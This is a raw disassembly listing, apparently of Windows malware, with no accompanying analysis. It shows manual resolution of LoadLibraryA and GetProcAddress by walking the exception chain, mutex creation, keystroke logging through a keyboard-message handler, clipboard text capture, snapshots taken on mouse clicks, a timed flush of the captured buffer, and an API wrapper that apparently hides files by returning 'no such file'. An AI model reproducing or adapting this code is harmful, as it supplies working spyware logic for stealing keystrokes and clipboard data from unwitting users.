loc_4040E0: ; CODE XREF: sub_404034+3F�j
mov eax, dword_40F810
mov ecx, dword_40F814
xor edx, edx
cmp eax, edi
pop ebx
jbe short loc_4040FC
loc_4040F2: ; CODE XREF: sub_404034+C6�j
cmp [ecx+edx*4], edi
jnz short loc_4040FC
inc edx
cmp edx, eax
jb short loc_4040F2
loc_4040FC: ; CODE XREF: sub_404034+BC�j
; sub_404034+C1�j
cmp edx, eax
jnz short loc_40410D
push ecx
mov dword_40F810, edi
call sub_409317
pop ecx
loc_40410D: ; CODE XREF: sub_404034+CA�j
push offset dword_40F7F8
call dword_40FE88 ; RtlLeaveCriticalSection
push [ebp+arg_0]
push [ebp+var_4]
call sub_4093AC
pop ecx
pop ecx
loc_404125: ; CODE XREF: sub_404034+28�j
call sub_403C06
xor al, al
pop edi
leave
retn
sub_404034 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40412F proc near ; CODE XREF: sub_4086F4+B5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push offset dword_40F7F8
call dword_40FE80 ; InitializeCriticalSection
mov esi, [ebp+arg_0]
inc dword ptr [esi]
lea eax, [ebp+var_4]
xor edi, edi
push eax
push offset dword_401028
mov dword_40F814, edi
mov dword_40F810, edi
mov [ebp+var_4], edi
call sub_40A476
cmp eax, edi
pop ecx
pop ecx
jz short loc_40417E
push eax
push [ebp+var_4]
call sub_403F78
push [ebp+var_4]
call sub_409317
add esp, 0Ch
loc_40417E: ; CODE XREF: sub_40412F+39�j
push edi
push edi
push esi
push offset sub_403EB7
push edi
push edi
call dword_40FE10 ; CreateThread
cmp eax, edi
jz short loc_40419D
push eax
call dword_40FDAC ; CloseHandle
mov al, 1
jmp short loc_4041A1
; ---------------------------------------------------------------------------
loc_40419D: ; CODE XREF: sub_40412F+61�j
dec dword ptr [esi]
xor al, al
loc_4041A1: ; CODE XREF: sub_40412F+6C�j
pop edi
pop esi
leave
retn
sub_40412F endp
; =============== S U B R O U T I N E =======================================
sub_4041A5 proc near ; CODE XREF: sub_404222+21�p
mov eax, edx
and eax, 0FFFF0000h
jz short loc_4041D6
loc_4041AE: ; CODE XREF: sub_4041A5+2F�j
cmp word ptr [eax], 5A4Dh
jnz short loc_4041CF
mov ecx, [eax+3Ch]
add ecx, eax
cmp ecx, edx
ja short loc_4041CF
cmp dword ptr [ecx], 4550h
jnz short loc_4041CF
mov ecx, [ecx+50h]
add ecx, eax
cmp ecx, edx
ja short locret_4041D8
loc_4041CF: ; CODE XREF: sub_4041A5+E�j
; sub_4041A5+17�j ...
sub eax, 10000h
jnz short loc_4041AE
loc_4041D6: ; CODE XREF: sub_4041A5+7�j
xor eax, eax
locret_4041D8: ; CODE XREF: sub_4041A5+28�j
retn
sub_4041A5 endp
; =============== S U B R O U T I N E =======================================
sub_4041D9 proc near ; CODE XREF: sub_404222+30�p
; sub_404222+44�p
arg_0 = dword ptr 4
mov eax, [edi+3Ch]
push ebx
push esi
mov esi, [eax+edi+78h]
add esi, edi
xor ebx, ebx
cmp [esi+18h], ebx
jbe short loc_404210
loc_4041EB: ; CODE XREF: sub_4041D9+35�j
lea eax, [edi+ebx*4]
add eax, [esi+20h]
push 0FFFFFFFFh
mov eax, [eax]
push 0FFFFFFFFh
add eax, edi
push eax
push [esp+14h+arg_0]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_404215
inc ebx
cmp ebx, [esi+18h]
jb short loc_4041EB
loc_404210: ; CODE XREF: sub_4041D9+10�j
xor eax, eax
loc_404212: ; CODE XREF: sub_4041D9+47�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404215: ; CODE XREF: sub_4041D9+2F�j
mov eax, [esi+1Ch]
lea eax, [eax+ebx*4]
mov eax, [eax+edi]
add eax, edi
jmp short loc_404212
sub_4041D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404222 proc near ; CODE XREF: sub_404303�j sub_404308�p
var_214 = dword ptr -214h
var_20C = byte ptr -20Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20Ch
push edi
xor edx, edx
mov eax, fs:[edx]
dec edx
loc_404232: ; CODE XREF: sub_404222+16�j
cmp [eax], edx
jz short loc_40423A
mov eax, [eax]
jmp short loc_404232
; ---------------------------------------------------------------------------
loc_40423A: ; CODE XREF: sub_404222+12�j
mov eax, [eax+4]
mov [ebp+var_4], eax
mov edx, [ebp+var_4]
call sub_4041A5
mov edi, eax
push offset aLoadlibrarya ; "LoadLibraryA"
mov [ebp+var_4], edi
call sub_4041D9
mov edi, [ebp+var_4]
mov dword_40FD08, eax
mov [esp+214h+var_214], offset aGetprocaddress ; "GetProcAddress"
call sub_4041D9
push 7Eh
mov dword_40FD04, eax
call sub_40AAD4
test al, al
pop ecx
pop ecx
pop edi
jnz short loc_404280
leave
retn
; ---------------------------------------------------------------------------
loc_404280: ; CODE XREF: sub_404222+5A�j
and dword_40F818, 0
push esi
lea eax, [ebp+var_20C]
push eax
push 2
push dword_40FCA4
push dword_40FB30
call sub_409D8E
add esp, 10h
lea eax, [ebp+var_20C]
push eax
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
push 0
call sub_40AC72
call sub_40B4A0
call sub_4034A0
call sub_40E603
call sub_40C519
call sub_404888
mov [esp+214h+var_214], offset dword_40F81C
call dword_40FE80 ; InitializeCriticalSection
push 0FFFFFFFFh
mov esi, offset off_40F2C0
push esi
call sub_4069E5
push 0FFFFFFFFh
push esi
call sub_406E36
add esp, 10h
mov al, 1
pop esi
leave
retn
sub_404222 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame thunk
sub_404303 proc near ; DATA XREF: sub_406E98+89�o
; sub_4183BE+89�o
jmp sub_404222
sub_404303 endp
; =============== S U B R O U T I N E =======================================
sub_404308 proc near ; DATA XREF: sub_404337+6�o
; .data:00415863�o
call sub_404222
test al, al
jnz short loc_404314
loc_404311: ; CODE XREF: sub_404308+19�j
; sub_404308+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_404314: ; CODE XREF: sub_404308+7�j
push 0
call dword_40FD64 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_404311
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_404311
mov ecx, [ecx+28h]
add ecx, eax
jmp ecx
sub_404308 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404337 proc near ; DATA XREF: .data:0040F008�o
; .data:0040F3C8�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push [ebp+arg_1C]
mov eax, offset sub_404308
push [ebp+arg_18]
sub eax, dword_40FCB0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_406C44
add esp, 24h
pop ebp
retn 20h
sub_404337 endp
; =============== S U B R O U T I N E =======================================
sub_40436A proc near ; DATA XREF: .data:0040F030�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
cmp ecx, dword_40FBB0
mov edx, [esp+arg_4]
jz short loc_404382
cmp ecx, dword_40FCB8
jnz short loc_40438B
loc_404382: ; CODE XREF: sub_40436A+E�j
test edx, edx
jz short loc_40438B
mov eax, [edx+4]
jmp short loc_40438D
; ---------------------------------------------------------------------------
loc_40438B: ; CODE XREF: sub_40436A+16�j
; sub_40436A+1A�j
xor eax, eax
loc_40438D: ; CODE XREF: sub_40436A+1F�j
push [esp+arg_C]
push [esp+4+arg_8]
push edx
push ecx
push offset off_40F2C0
push eax
call sub_406D03
add esp, 18h
retn 10h
sub_40436A endp
; =============== S U B R O U T I N E =======================================
sub_4043A8 proc near ; DATA XREF: .data:0040F01C�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
push offset off_40F2C0
push offset dword_40F81C
call sub_406D52
add esp, 18h
retn 10h
sub_4043A8 endp
; =============== S U B R O U T I N E =======================================
sub_4043CD proc near ; CODE XREF: sub_404416+167�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
shr [esp+arg_4], 1
push ebx
xor bl, bl
loc_4043D4: ; CODE XREF: sub_4043CD+3F�j
movzx eax, bl
movzx ecx, byte_40F065[eax]
cmp ecx, [esp+4+arg_4]
jnz short loc_404406
push [esp+4+arg_4]
movzx eax, byte_40F064[eax]
mov ecx, dword_40FB34
push dword ptr [ecx+eax*4]
push [esp+0Ch+arg_0]
call dword_40FC78
test eax, eax
jz short loc_404412
loc_404406: ; CODE XREF: sub_4043CD+15�j
add bl, 2
cmp bl, 4
jb short loc_4043D4
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404412: ; CODE XREF: sub_4043CD+37�j
mov al, 1
pop ebx
retn
sub_4043CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404416 proc near ; DATA XREF: .data:0040F044�o
var_608 = word ptr -608h
var_604 = dword ptr -604h
var_208 = byte ptr -208h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
sub esp, 608h
push ebx
mov ebx, [ebp+arg_1C]
push esi
push edi
push [ebp+arg_28]
push [ebp+arg_24]
push [ebp+arg_20]
push ebx
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FC34
xor esi, esi
cmp eax, esi
mov [ebp+arg_24], eax
jnz loc_4045AE
cmp [ebp+arg_14], esi
jz loc_4045AE
cmp ebx, 1
jz short loc_404478
cmp ebx, 2
jz short loc_404478
cmp ebx, 3
jz short loc_404478
cmp ebx, 0Ch
jnz loc_4045AE
loc_404478: ; CODE XREF: sub_404416+4D�j
; sub_404416+52�j ...
lea eax, [ebp+arg_20]
push eax
push 400h
lea eax, [ebp+var_608]
push eax
push 1
push [ebp+arg_0]
mov [ebp+arg_20], esi
call dword_40FC28
test eax, eax
jnz loc_4045AE
cmp dword_40F818, esi
movzx eax, [ebp+var_608]
mov ecx, [ebp+var_604]
mov [ecx+eax*2], si
jnz short loc_404507
lea eax, [ebp+var_208]
push eax
call sub_409CE2
lea eax, [ebp+var_208]
push eax
call sub_40A7E1
pop ecx
pop ecx
push 2
mov dword_40F818, eax
mov esi, offset byte_40F065
pop edi
loc_4044DE: ; CODE XREF: sub_404416+E0�j
movzx eax, byte ptr [esi-1]
mov ecx, dword_40FB34
push dword ptr [ecx+eax*4]
call dword_40FD90 ; lstrlenW
mov [esi], al
inc esi
inc esi
dec edi
jnz short loc_4044DE
cmp dword_40F818, 0
jz loc_4045AE
xor esi, esi
loc_404507: ; CODE XREF: sub_404416+9F�j
push [ebp+var_604]
push dword_40F818
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz loc_4045AE
mov eax, ebx
dec eax
mov [ebp+arg_28], esi
mov [ebp+arg_0], esi
jz short loc_404559
dec eax
jz short loc_404550
dec eax
jz short loc_404547
sub eax, 9
jnz short loc_404567
mov [ebp+arg_28], 0Ch
mov [ebp+arg_0], 8
jmp short loc_404567
; ---------------------------------------------------------------------------
loc_404547: ; CODE XREF: sub_404416+11A�j
mov [ebp+arg_28], 5Eh
jmp short loc_404560
; ---------------------------------------------------------------------------
loc_404550: ; CODE XREF: sub_404416+117�j
mov [ebp+arg_28], 44h
jmp short loc_404560
; ---------------------------------------------------------------------------
loc_404559: ; CODE XREF: sub_404416+114�j
mov [ebp+arg_28], 40h
loc_404560: ; CODE XREF: sub_404416+138�j
; sub_404416+141�j
mov [ebp+arg_0], 3Ch
loc_404567: ; CODE XREF: sub_404416+11F�j
; sub_404416+12F�j
xor ebx, ebx
loc_404569: ; CODE XREF: sub_404416+184�j
mov eax, [ebp+arg_14]
mov edi, esi
lea esi, [ebx+eax]
mov eax, [ebp+arg_0]
push dword ptr [esi+eax]
mov eax, [ebp+arg_28]
add eax, esi
push eax
call sub_4043CD
test al, al
pop ecx
pop ecx
jz short loc_404594
mov eax, [esi]
test eax, eax
jz short loc_40459E
test edi, edi
jz short loc_404594
add [edi], eax
loc_404594: ; CODE XREF: sub_404416+170�j
; sub_404416+17A�j
mov eax, [esi]
add ebx, eax
test eax, eax
ja short loc_404569
jmp short loc_4045AE
; ---------------------------------------------------------------------------
loc_40459E: ; CODE XREF: sub_404416+176�j
test edi, edi
jz short loc_4045A7
and dword ptr [edi], 0
jmp short loc_4045AE
; ---------------------------------------------------------------------------
loc_4045A7: ; CODE XREF: sub_404416+18A�j
mov [ebp+arg_24], 0C000000Fh
loc_4045AE: ; CODE XREF: sub_404416+3B�j
; sub_404416+44�j ...
mov eax, [ebp+arg_24]
pop edi
pop esi
pop ebx
leave
retn 2Ch
sub_404416 endp
; ---------------------------------------------------------------------------
mov ax, [esp+4]
push dword_40F854
mov word_40F85C, ax
call sub_409317
cmp dword ptr [esp+0Ch], 0
pop ecx
jz short loc_4045E9
push 0FFFFFFFFh
push dword ptr [esp+0Ch]
call sub_40A791
pop ecx
pop ecx
mov dword_40F854, eax
retn
; ---------------------------------------------------------------------------
loc_4045E9: ; CODE XREF: .text:004045D4�j
and dword_40F854, 0
retn
; =============== S U B R O U T I N E =======================================
sub_4045F1 proc near ; CODE XREF: sub_404624+1A�j
; sub_404624+49�p ...
push esi
mov esi, offset dword_40F838
push esi
call dword_40FE84 ; RtlEnterCriticalSection
push dword_40F858
call sub_409317
xor eax, eax
pop ecx
push esi
mov byte_40F834, al
mov dword_40F850, eax
mov dword_40F858, eax
call dword_40FE88 ; RtlLeaveCriticalSection
pop esi
retn
sub_4045F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404624 proc near ; CODE XREF: sub_40471E+4B�p
; sub_40471E+5B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
jz loc_40471B
push edi
push 64h
pop edi
cmp ebx, edi
jbe short loc_404643
pop edi
pop ebx
pop ebp
jmp sub_4045F1
; ---------------------------------------------------------------------------
loc_404643: ; CODE XREF: sub_404624+15�j
push offset dword_40F838
call dword_40FE84 ; RtlEnterCriticalSection
call dword_40FDE8 ; GetTickCount
mov [ebp+arg_4], eax
mov eax, dword_40F850
test eax, eax
jz short loc_404672
mov ecx, [ebp+arg_4]
sub ecx, eax
cmp ecx, 0EA60h
jbe short loc_404672
call sub_4045F1
loc_404672: ; CODE XREF: sub_404624+3A�j
; sub_404624+47�j
movzx eax, byte_40F834
add eax, ebx
cmp eax, edi
push esi
jbe short loc_4046D3
push edi
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jz short loc_404706
push ebx
push [ebp+arg_0]
sub eax, ebx
add eax, edi
push eax
call sub_409331
movzx eax, byte_40F834
add eax, dword_40F858
sub edi, ebx
push edi
lea eax, [eax+ebx-64h]
push eax
push esi
call sub_409331
push dword_40F858
call sub_409317
add esp, 1Ch
mov dword_40F858, esi
mov byte_40F834, 64h
jmp short loc_404706
; ---------------------------------------------------------------------------
loc_4046D3: ; CODE XREF: sub_404624+5A�j
push eax
push dword_40F858
call sub_40A91F
test eax, eax
pop ecx
pop ecx
jz short loc_404706
movzx ecx, byte_40F834
push ebx
push [ebp+arg_0]
add ecx, eax
push ecx
mov dword_40F858, eax
call sub_409331
add esp, 0Ch
add byte_40F834, bl
loc_404706: ; CODE XREF: sub_404624+67�j
; sub_404624+AD�j ...
mov eax, [ebp+arg_4]
push offset dword_40F838
mov dword_40F850, eax
call dword_40FE88 ; RtlLeaveCriticalSection
pop esi
pop edi
loc_40471B: ; CODE XREF: sub_404624+9�j
pop ebx
pop ebp
retn
sub_404624 endp
; =============== S U B R O U T I N E =======================================
sub_40471E proc near ; DATA XREF: .data:0040F278�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push esi
call dword_40FAE8
mov ebx, eax
test ebx, ebx
mov [esp+8+arg_0], ebx
jz loc_4047D7
cmp esi, 1
jz short loc_40474C
cmp esi, 0Dh
jz short loc_40474C
cmp esi, 7
jnz loc_4047D7
loc_40474C: ; CODE XREF: sub_40471E+1E�j
; sub_40471E+23�j
push edi
push ebx
call dword_40FEAC ; GlobalLock
mov edi, eax
test edi, edi
jz short loc_4047D6
xor ebx, ebx
cmp esi, 0Dh
jz short loc_40478B
push 1
mov esi, offset asc_401288 ; " "
push esi
call sub_404624
pop ecx
pop ecx
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_404624
push 1
push esi
call sub_404624
add esp, 10h
jmp short loc_4047C4
; ---------------------------------------------------------------------------
loc_40478B: ; CODE XREF: sub_40471E+41�j
push ebp
push edi
call dword_40FD90 ; lstrlenW
mov ebp, eax
push ebp
push edi
call sub_40A6F7
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_4047C3
push 1
mov esi, offset asc_401288 ; " "
push esi
call sub_404624
push ebp
push ebx
call sub_404624
push 1
push esi
call sub_404624
add esp, 18h
loc_4047C3: ; CODE XREF: sub_40471E+84�j
pop ebp
loc_4047C4: ; CODE XREF: sub_40471E+6B�j
push ebx
call sub_409317
mov ebx, [esp+0Ch+arg_4]
pop ecx
push ebx
call dword_40FEB0 ; GlobalUnlock
loc_4047D6: ; CODE XREF: sub_40471E+3A�j
pop edi
loc_4047D7: ; CODE XREF: sub_40471E+15�j
; sub_40471E+28�j
pop esi
mov eax, ebx
pop ebx
retn 4
sub_40471E endp
; ---------------------------------------------------------------------------
cmp byte_40F834, 0
jbe locret_404887
cmp dword_40F858, 0
jz locret_404887
push ebx
push esi
push edi
mov ebx, offset dword_40F838
push ebx
call dword_40FE84 ; RtlEnterCriticalSection
movzx eax, byte_40F834
mov esi, [esp+10h]
add eax, 0Ah
push eax
push dword ptr [esi]
call sub_40A91F
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_40487D
mov eax, dword_40FB34
push dword ptr [eax+148h]
call dword_40FD94 ; lstrlenA
push eax
mov [esi], edi
mov eax, dword_40FB34
push dword ptr [eax+148h]
push edi
call sub_409331
movzx eax, byte_40F834
push eax
mov eax, [esi]
push dword_40F858
add eax, 6
push eax
call sub_409331
movzx eax, byte_40F834
mov ecx, [esi]
mov byte ptr [ecx+eax+6], 0Ah
lea ecx, [eax+7]
mov eax, [esp+2Ch]
add esp, 18h
add [eax], ecx
loc_40487D: ; CODE XREF: .text:00404823�j
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
locret_404887: ; CODE XREF: .text:004047E5�j
; .text:004047F2�j
retn
; =============== S U B R O U T I N E =======================================
sub_404888 proc near ; CODE XREF: sub_404222+B2�p
push offset dword_40F838
call dword_40FE80 ; InitializeCriticalSection
and dword_40F858, 0
call sub_4045F1
and word_40F85C, 0
and dword_40F854, 0
retn
sub_404888 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048AF proc near ; CODE XREF: sub_4049F7+1F�p
; sub_404A23+1F�p ...
var_30C = byte ptr -30Ch
var_104 = byte ptr -104h
var_4 = byte ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jz loc_4049F3
mov eax, [edi+4]
cmp eax, 201h
push esi
jnz loc_404965
cmp word_40F85C, bx
jz loc_4049F2
mov eax, dword_40FB34
dec word_40F85C
push 96h
push 1Eh
push dword ptr [eax+88h]
call sub_407570
mov esi, eax
add esp, 0Ch
cmp esi, ebx
jz loc_404993
mov eax, dword_40F854
cmp eax, ebx
mov edi, eax
jnz short loc_40491E
mov edi, offset aUnknown ; "unknown"
loc_40491E: ; CODE XREF: sub_4048AF+68�j
call dword_40FDE8 ; GetTickCount
push eax
call dword_40FE44 ; GetCurrentProcessId
push eax
mov eax, dword_40FB34
push edi
push dword ptr [eax+8Ch]
lea eax, [ebp+var_30C]
push 103h
push eax
call dword_40FC84
lea eax, [ebp+var_30C]
push esi
push eax
call sub_40BA15
mov eax, [esi]
add esp, 20h
push esi
call dword ptr [eax+8]
mov edi, [ebp+arg_0]
jmp short loc_404993
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_4048AF+21�j
cmp eax, 100h
jnz loc_4049F2
push 11h
call dword_40FAE4
movsx eax, ax
mov esi, 80000000h
test eax, esi
jnz short loc_4049F2
push 12h
call dword_40FAE4
movsx eax, ax
test eax, esi
jnz short loc_4049F2
loc_404993: ; CODE XREF: sub_4048AF+59�j
; sub_4048AF+B4�j
lea eax, [ebp+var_104]
push eax
mov [ebp+var_2], bx
call dword_40FAF0
test eax, eax
jz short loc_4049F2
push ebx
xor esi, esi
inc esi
push esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_104]
push eax
push ebx
push dword ptr [edi+8]
call dword_40FAEC
cmp eax, esi
jnz short loc_4049F2
push ebx
push ebx
push esi
lea eax, [ebp+arg_0+3]
push eax
push esi
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
mov byte ptr [ebp+arg_0+3], bl
call dword_40FE64 ; WideCharToMultiByte
test eax, eax
jz short loc_4049F2
cmp byte ptr [ebp+arg_0+3], bl
jz short loc_4049F2
lea eax, [ebp+arg_0+3]
push esi
push eax
call sub_404624
pop ecx
pop ecx
loc_4049F2: ; CODE XREF: sub_4048AF+2E�j
; sub_4048AF+BB�j ...
pop esi
loc_4049F3: ; CODE XREF: sub_4048AF+12�j
pop edi
pop ebx
leave
retn
sub_4048AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049F7 proc near ; DATA XREF: .data:0040F23C�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FAD8
mov esi, eax
test esi, esi
jz short loc_404A1C
push [ebp+arg_0]
call sub_4048AF
pop ecx
loc_404A1C: ; CODE XREF: sub_4049F7+1A�j
mov eax, esi
pop esi
pop ebp
retn 10h
sub_4049F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A23 proc near ; DATA XREF: .data:0040F228�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FADC
mov esi, eax
test esi, esi
jz short loc_404A48
push [ebp+arg_0]
call sub_4048AF
pop ecx
loc_404A48: ; CODE XREF: sub_404A23+1A�j
mov eax, esi
pop esi
pop ebp
retn 10h
sub_404A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A4F proc near ; DATA XREF: .data:0040F250�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FAE0
mov esi, eax
test esi, esi
jz short loc_404A77
push [ebp+arg_0]
call sub_4048AF
pop ecx
loc_404A77: ; CODE XREF: sub_404A4F+1D�j
mov eax, esi
pop esi
pop ebp
retn 14h
sub_404A4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A7E proc near ; DATA XREF: .data:0040F264�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FAD4
mov esi, eax
test esi, esi
jz short loc_404AA6
push [ebp+arg_0]
call sub_4048AF
pop ecx
loc_404AA6: ; CODE XREF: sub_404A7E+1D�j
mov eax, esi
pop esi
pop ebp
retn 14h
sub_404A7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404AAD proc near ; CODE XREF: sub_404C11+63�p
var_828 = byte ptr -828h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 828h
push edi
xor edi, edi
push edi
push 3
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call sub_409BD4
add esp, 10h
test al, al
jz loc_404C0B
lea eax, [ebp+var_8]
push eax
push [ebp+var_24]
mov [ebp+var_8], edi
push [ebp+var_28]
call sub_40B34D
add esp, 0Ch
cmp eax, edi
mov [ebp+var_14], eax
jz loc_404C01
cmp [ebp+var_8], edi
mov [ebp+var_10], edi
mov [ebp+var_C], edi
jbe loc_404BF4
push ebx
push esi
lea esi, [eax+4]
jmp short loc_404B0E
; ---------------------------------------------------------------------------
loc_404B0C: ; CODE XREF: sub_404AAD+12A�j
xor edi, edi
loc_404B0E: ; CODE XREF: sub_404AAD+5D�j
mov eax, [esi-4]
cmp eax, edi
mov [ebp+var_18], eax
jz loc_404BE6
mov ebx, [esi]
cmp ebx, edi
jz loc_404BE6
mov edi, [esi+4]
test edi, edi
jz loc_404BE4
push eax
call sub_40A8B5
push ebx
call sub_40A8B5
push edi
call sub_40A8B5
xor ebx, ebx
add esp, 0Ch
cmp [ebp+var_10], ebx
jz short loc_404B61
push 0FFFFFFFFh
push 0FFFFFFFFh
push edi
push [ebp+var_10]
call sub_408F6D
add esp, 10h
test eax, eax
jz short loc_404B92
loc_404B61: ; CODE XREF: sub_404AAD+9E�j
push edi
push offset dword_4012A8
lea eax, [ebp+var_828]
push 7FFh
push eax
call dword_40FC88
push 1
lea eax, [ebp+var_828]
push eax
lea eax, [ebp+var_4]
push eax
call sub_40B2E4
add esp, 1Ch
test al, al
jz short loc_404BDF
loc_404B92: ; CODE XREF: sub_404AAD+B2�j
push dword ptr [esi]
lea eax, [ebp+var_828]
push [ebp+var_18]
push offset dword_4012A0
push 7FFh
push eax
call dword_40FC88
push 1
lea eax, [ebp+var_828]
push eax
lea eax, [ebp+var_4]
push eax
call sub_40B2E4
add esp, 20h
test al, al
jz short loc_404BDF
add [ebp+var_C], 9
mov eax, [ebp+var_C]
add esi, 24h
cmp eax, [ebp+var_8]
mov [ebp+var_10], edi
jb loc_404B0C
jmp short loc_404BF2
; ---------------------------------------------------------------------------
loc_404BDF: ; CODE XREF: sub_404AAD+E3�j
; sub_404AAD+118�j
mov [ebp+var_4], ebx
jmp short loc_404BF2
; ---------------------------------------------------------------------------
loc_404BE4: ; CODE XREF: sub_404AAD+7E�j
xor edi, edi
loc_404BE6: ; CODE XREF: sub_404AAD+69�j
; sub_404AAD+73�j
push [ebp+var_4]
call sub_409317
pop ecx
mov [ebp+var_4], edi
loc_404BF2: ; CODE XREF: sub_404AAD+130�j
; sub_404AAD+135�j
pop esi
pop ebx
loc_404BF4: ; CODE XREF: sub_404AAD+52�j
push [ebp+var_8]
push [ebp+var_14]
call sub_4093AC
pop ecx
pop ecx
loc_404C01: ; CODE XREF: sub_404AAD+43�j
lea eax, [ebp+var_28]
push eax
call sub_409C8A
pop ecx
loc_404C0B: ; CODE XREF: sub_404AAD+23�j
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_404AAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C11 proc near ; CODE XREF: sub_404D6D+307�p
; .text:00405602�p
var_21C = byte ptr -21Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 21Ch
cmp [ebp+arg_0], 0
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
jz short loc_404C2F
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
and dword ptr [esi], 0
loc_404C2F: ; CODE XREF: sub_404C11+13�j
mov edi, 1000h
push edi
mov [ebp+var_1], 1
call sub_4092F9
mov ebx, eax
pop ecx
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], edi
mov dword ptr [ebx], 50h
mov eax, dword_40FB34
push ebx
push dword ptr [eax+124h]
call dword_40FB94
test eax, eax
mov [ebp+var_14], eax
jz loc_404D1B
loc_404C6B: ; CODE XREF: sub_404C11+E1�j
cmp [ebp+arg_0], 0
jz short loc_404CC7
push dword ptr [ebx+8]
call sub_404AAD
test eax, eax
pop ecx
